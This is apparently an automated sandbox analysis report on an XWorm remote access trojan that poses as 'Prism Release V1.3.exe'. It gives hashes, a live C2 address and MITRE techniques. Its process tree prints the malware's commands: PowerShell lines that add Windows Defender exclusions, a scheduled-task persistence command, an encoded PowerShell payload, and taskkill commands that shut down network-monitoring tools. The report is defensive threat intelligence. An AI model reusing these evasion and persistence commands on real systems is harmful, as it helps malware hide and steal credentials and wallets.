xworm | 0ffc383067c74a8ca5576ed940e77e6adb0ec979294b1c12746d541e51558743

Analysis

max time kernel
300s
max time network
291s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
16/06/2024, 21:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Prism Release/Prism Release V1.3.exe
Size

5.1MB
MD5

7e1841390354f79ea0a211457dded684
SHA1

6c500478bd165f741ed469a571b94fd159aa03a0
SHA256

af714718f7ad3bcb60321daf63f23e7f2a586903baea8014d5f27dd65d4a9413
SHA512

6c0f54c9c1e794c3e01d3725bf1c9e654254f6a9068dc287ed7b11ee7abc226307712a62d3ac034e38b993e6e19c12f8593bfbf9cab1c5df4f49123187cc4ca5
SSDEEP

98304:LpyqiI/na1r1jg/hNMNNrrpbeRB45YenyHCaCP9iKIA20Fh1SDi3GoYm:Nr/na/OGLrrpqR25FyHCaeXhFyDi3GoY

Score

10^/10

xworm execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

91.92.241.69:5555

Attributes

Install_directory
%ProgramData%
install_file
Windows Runtime.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral3/files/0x000a0000000233ed-11.dat	family_xworm
behavioral3/memory/4604-52-0x0000000000AD0000-0x0000000000AEA000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5036	powershell.exe
3504	powershell.exe
2016	powershell.exe
4324	powershell.exe
4196	powershell.exe
5036	powershell.exe
1408	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation	Prism Release V1.3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation	dllhost.exe

Drops startup file 5 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk	dllhost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk	dllhost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe	svchost.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\intel graphics processor.exe	taskmgr.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe	svchost.exe

Executes dropped EXE 11 IoCs

pid	Process
924	prism.exe
4604	dllhost.exe
1808	nexusloader.exe
4680	Windows Runtime.exe
540	nyfcwl.exe
4676	svchost.exe
3960	svchost.exe
1732	Windows Runtime.exe
2496	Process not Found
1184	Process not Found
3928	Process not Found

Loads dropped DLL 64 IoCs

pid	Process
1808	nexusloader.exe
1808	nexusloader.exe
1808	nexusloader.exe
1808	nexusloader.exe
1808	nexusloader.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe"	dllhost.exe

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
45	api.ipify.org
46	api.ipify.org
47	ipinfo.io
48	ipinfo.io
8	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5084	schtasks.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
1644	taskkill.exe
2788	Process not Found
2284	Process not Found
3336	Process not Found
2044	taskkill.exe
4112	taskkill.exe
2200	Process not Found
3340	Process not Found
696	Process not Found
4976	taskkill.exe
4912	Process not Found
4860	Process not Found
1016	Process not Found
756	Process not Found
1748	Process not Found
116	Process not Found
2064	Process not Found
5036	Process not Found
2156	Process not Found
1152	Process not Found
4524	taskkill.exe
3744	Process not Found
2284	Process not Found
888	Process not Found
3588	Process not Found
4356	Process not Found
1968	Process not Found
3392	taskkill.exe
4648	Process not Found
2412	Process not Found
1092	Process not Found
3988	Process not Found
3648	Process not Found
4788	Process not Found
5056	Process not Found
544	taskkill.exe
3672	Process not Found
464	Process not Found
2792	Process not Found
1352	Process not Found
2676	Process not Found
3168	taskkill.exe
3304	taskkill.exe
1936	taskkill.exe
3440	Process not Found
928	Process not Found
3584	Process not Found
1568	Process not Found
3192	Process not Found
4044	Process not Found
4568	Process not Found
4148	Process not Found
4384	Process not Found
4160	taskkill.exe
2328	taskkill.exe
4744	taskkill.exe
3004	Process not Found
2904	Process not Found
1376	Process not Found
760	Process not Found
3540	Process not Found
4508	Process not Found
5052	taskkill.exe
4600	Process not Found

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4604	dllhost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1408	powershell.exe
1408	powershell.exe
3504	powershell.exe
3504	powershell.exe
2016	powershell.exe
2016	powershell.exe
4324	powershell.exe
4324	powershell.exe
4196	powershell.exe
4196	powershell.exe
4604	dllhost.exe
4604	dllhost.exe
4604	dllhost.exe
4604	dllhost.exe
4604	dllhost.exe
4604	dllhost.exe
4604	dllhost.exe
4604	dllhost.exe
4604	dllhost.exe
4604	dllhost.exe
4604	dllhost.exe
4604	dllhost.exe
4604	dllhost.exe
4604	dllhost.exe
4604	dllhost.exe
4604	dllhost.exe
4604	dllhost.exe
4604	dllhost.exe
4604	dllhost.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
4676	svchost.exe
5036	powershell.exe
5036	powershell.exe
5036	powershell.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2172	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4604	dllhost.exe
Token: SeDebugPrivilege	1408	powershell.exe
Token: SeDebugPrivilege	3504	powershell.exe
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeDebugPrivilege	4324	powershell.exe
Token: SeDebugPrivilege	4196	powershell.exe
Token: SeDebugPrivilege	4604	dllhost.exe
Token: SeDebugPrivilege	2172	taskmgr.exe
Token: SeSystemProfilePrivilege	2172	taskmgr.exe
Token: SeCreateGlobalPrivilege	2172	taskmgr.exe
Token: SeDebugPrivilege	4680	Windows Runtime.exe
Token: SeDebugPrivilege	4676	svchost.exe
Token: SeDebugPrivilege	3960	svchost.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	5084	taskkill.exe
Token: SeDebugPrivilege	320	taskkill.exe
Token: SeDebugPrivilege	2684	taskkill.exe
Token: SeDebugPrivilege	2856	taskkill.exe
Token: SeDebugPrivilege	3160	taskkill.exe
Token: SeDebugPrivilege	1388	taskkill.exe
Token: SeDebugPrivilege	4884	taskkill.exe
Token: SeDebugPrivilege	1760	taskkill.exe
Token: SeDebugPrivilege	4528	taskkill.exe
Token: SeDebugPrivilege	3392	taskkill.exe
Token: SeDebugPrivilege	4828	taskkill.exe
Token: SeDebugPrivilege	3164	taskkill.exe
Token: SeDebugPrivilege	440	taskkill.exe
Token: SeDebugPrivilege	1240	taskkill.exe
Token: SeDebugPrivilege	3344	taskkill.exe
Token: SeDebugPrivilege	4180	taskkill.exe
Token: SeDebugPrivilege	320	taskkill.exe
Token: SeDebugPrivilege	4856	taskkill.exe
Token: SeDebugPrivilege	2856	taskkill.exe
Token: SeDebugPrivilege	2284	taskkill.exe
Token: SeDebugPrivilege	784	taskkill.exe
Token: SeDebugPrivilege	3968	taskkill.exe
Token: SeDebugPrivilege	4272	taskkill.exe
Token: SeDebugPrivilege	2280	taskkill.exe
Token: SeDebugPrivilege	1784	taskkill.exe
Token: SeDebugPrivilege	2500	taskkill.exe
Token: SeDebugPrivilege	4860	taskkill.exe
Token: SeDebugPrivilege	1012	taskkill.exe
Token: SeDebugPrivilege	3868	taskkill.exe
Token: SeDebugPrivilege	4872	taskkill.exe
Token: SeDebugPrivilege	3428	taskkill.exe
Token: SeDebugPrivilege	4948	taskkill.exe
Token: SeDebugPrivilege	4856	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeDebugPrivilege	2604	taskkill.exe
Token: SeDebugPrivilege	2732	taskkill.exe
Token: SeDebugPrivilege	5024	taskkill.exe
Token: SeDebugPrivilege	1820	taskkill.exe
Token: SeDebugPrivilege	2280	taskkill.exe
Token: SeDebugPrivilege	4488	taskkill.exe
Token: SeDebugPrivilege	3648	taskkill.exe
Token: SeDebugPrivilege	2820	taskkill.exe
Token: SeDebugPrivilege	4376	taskkill.exe
Token: SeDebugPrivilege	2064	taskkill.exe
Token: SeDebugPrivilege	5036	taskkill.exe
Token: SeDebugPrivilege	5020	taskkill.exe
Token: SeDebugPrivilege	548	taskkill.exe
Token: SeDebugPrivilege	3188	taskkill.exe
Token: SeDebugPrivilege	2284	taskkill.exe
Token: SeDebugPrivilege	4344	taskkill.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe
2172	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4604	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3972 wrote to memory of 1408	3972	Prism Release V1.3.exe	81
PID 3972 wrote to memory of 1408	3972	Prism Release V1.3.exe	81
PID 3972 wrote to memory of 1408	3972	Prism Release V1.3.exe	81
PID 3972 wrote to memory of 924	3972	Prism Release V1.3.exe	83
PID 3972 wrote to memory of 924	3972	Prism Release V1.3.exe	83
PID 3972 wrote to memory of 4604	3972	Prism Release V1.3.exe	84
PID 3972 wrote to memory of 4604	3972	Prism Release V1.3.exe	84
PID 924 wrote to memory of 1808	924	prism.exe	86
PID 924 wrote to memory of 1808	924	prism.exe	86
PID 4604 wrote to memory of 3504	4604	dllhost.exe	90
PID 4604 wrote to memory of 3504	4604	dllhost.exe	90
PID 4604 wrote to memory of 2016	4604	dllhost.exe	92
PID 4604 wrote to memory of 2016	4604	dllhost.exe	92
PID 4604 wrote to memory of 4324	4604	dllhost.exe	95
PID 4604 wrote to memory of 4324	4604	dllhost.exe	95
PID 4604 wrote to memory of 4196	4604	dllhost.exe	97
PID 4604 wrote to memory of 4196	4604	dllhost.exe	97
PID 4604 wrote to memory of 5084	4604	dllhost.exe	101
PID 4604 wrote to memory of 5084	4604	dllhost.exe	101
PID 4604 wrote to memory of 540	4604	dllhost.exe	112
PID 4604 wrote to memory of 540	4604	dllhost.exe	112
PID 540 wrote to memory of 4676	540	nyfcwl.exe	113
PID 540 wrote to memory of 4676	540	nyfcwl.exe	113
PID 4676 wrote to memory of 64	4676	svchost.exe	114
PID 4676 wrote to memory of 64	4676	svchost.exe	114
PID 4676 wrote to memory of 3960	4676	svchost.exe	116
PID 4676 wrote to memory of 3960	4676	svchost.exe	116
PID 3960 wrote to memory of 3540	3960	svchost.exe	117
PID 3960 wrote to memory of 3540	3960	svchost.exe	117
PID 4676 wrote to memory of 5036	4676	svchost.exe	119
PID 4676 wrote to memory of 5036	4676	svchost.exe	119
PID 3960 wrote to memory of 2064	3960	svchost.exe	121
PID 3960 wrote to memory of 2064	3960	svchost.exe	121
PID 2064 wrote to memory of 5084	2064	cmd.exe	123
PID 2064 wrote to memory of 5084	2064	cmd.exe	123
PID 3960 wrote to memory of 3140	3960	svchost.exe	124
PID 3960 wrote to memory of 3140	3960	svchost.exe	124
PID 3140 wrote to memory of 320	3140	cmd.exe	126
PID 3140 wrote to memory of 320	3140	cmd.exe	126
PID 3960 wrote to memory of 4568	3960	svchost.exe	127
PID 3960 wrote to memory of 4568	3960	svchost.exe	127
PID 4568 wrote to memory of 2684	4568	cmd.exe	129
PID 4568 wrote to memory of 2684	4568	cmd.exe	129
PID 3960 wrote to memory of 1560	3960	svchost.exe	130
PID 3960 wrote to memory of 1560	3960	svchost.exe	130
PID 1560 wrote to memory of 2856	1560	cmd.exe	132
PID 1560 wrote to memory of 2856	1560	cmd.exe	132
PID 3960 wrote to memory of 2020	3960	svchost.exe	133
PID 3960 wrote to memory of 2020	3960	svchost.exe	133
PID 2020 wrote to memory of 3160	2020	cmd.exe	135
PID 2020 wrote to memory of 3160	2020	cmd.exe	135
PID 3960 wrote to memory of 1408	3960	svchost.exe	136
PID 3960 wrote to memory of 1408	3960	svchost.exe	136
PID 1408 wrote to memory of 1388	1408	cmd.exe	138
PID 1408 wrote to memory of 1388	1408	cmd.exe	138
PID 4676 wrote to memory of 3984	4676	svchost.exe	139
PID 4676 wrote to memory of 3984	4676	svchost.exe	139
PID 3960 wrote to memory of 3040	3960	svchost.exe	141
PID 3960 wrote to memory of 3040	3960	svchost.exe	141
PID 3984 wrote to memory of 4884	3984	cmd.exe	143
PID 3984 wrote to memory of 4884	3984	cmd.exe	143
PID 3040 wrote to memory of 1760	3040	cmd.exe	144
PID 3040 wrote to memory of 1760	3040	cmd.exe	144
PID 4676 wrote to memory of 1748	4676	svchost.exe	145

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Prism Release\Prism Release V1.3.exe
"C:\Users\Admin\AppData\Local\Temp\Prism Release\Prism Release V1.3.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3972
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeABpACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AYQBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIAAtACAAUgB1AG4AIABBAHMAIABBAGQAbQBpAG4AIABJAGYAIABJAG4AagBlAGMAdABpAG8AbgAgAEYAYQBpAGwAcwAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdQBzAG4AIwA+AA=="
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1408
- C:\Users\Admin\AppData\Local\Temp\prism.exe
  "C:\Users\Admin\AppData\Local\Temp\prism.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:924
- - C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\nexusloader.exe
    "C:\Users\Admin\AppData\Local\Temp\prism.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1808
- C:\Users\Admin\dllhost.exe
  "C:\Users\Admin\dllhost.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2016
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4324
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4196
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"
    3⤵
    - Creates scheduled task(s)
    PID:5084
- - C:\Users\Admin\AppData\Local\Temp\nyfcwl.exe
    "C:\Users\Admin\AppData\Local\Temp\nyfcwl.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:540
  - - C:\Users\Admin\AppData\Local\Temp\onefile_540_133630461712021276\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\nyfcwl.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4676
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:64
    - - C:\Users\Admin\AppData\Local\Temp\onefile_540_133630461712021276\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\onefile_540_133630461712021276\svchost.exe" "--multiprocessing-fork" "parent_pid=4676" "pipe_handle=864"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3960
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:3540
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2064
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5084
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3140
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:320
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4568
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2684
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1560
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2856
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2020
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3160
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1408
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1388
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3040
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1760
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:3716
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3392
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:3552
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3164
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:4356
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1240
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:4032
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4180
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:1348
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4856
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:4680
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2284
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:4504
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4272
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:4160
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
